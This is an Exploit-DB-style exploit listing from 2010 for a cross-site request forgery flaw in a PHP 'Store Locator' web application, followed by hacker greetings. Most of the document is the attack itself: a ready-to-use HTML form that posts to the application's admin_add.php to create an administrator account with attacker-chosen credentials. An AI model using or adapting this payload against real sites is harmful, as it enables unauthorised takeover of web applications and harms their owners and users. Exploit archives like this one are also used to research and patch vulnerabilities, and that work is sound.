Store Locator - Cross-Site Request Forgery (Add Admin)

EDB-ID:

13813

CVE:

N/A


Author:

JaMbA

Type:

webapps


Platform:

PHP

Date:

2010-06-10


# vendor: www.ghostscripter.com
::::::::::::::[explo!t]:::::::
:::::::


<html>
<head>
<title> Store Locator Remote Add Admin Exploit  </title>
</head>
<body text="#00FF00" bgcolor="#000000">
<form action=http://server/StoreLocator/adm/admin_add.php method=post
style="text-align: center">
<br>
User: <input name="username" type="text" id="username" value="" />
<br>
Pass: <input name="password" type="password" id="password" value=""  />
<br>
<input type="submit" name="Submit" value="Create Admin" /><br>
&nbsp;<br>
</p>
</form>
</body>
<html>

::::::::::::::::::::::::::::::::::::::::::
Greetz to : Alnjm33-virus-pal - Predator-bingo2 - xXx-jago-dz
-inejcteur-4PY-SaYrOs- XR57 -Tr0y-x Ahmadso -alsaek
AnD all Tunisian hacker

:::::::::::::::::::S.W.T:::::::::::::::::::::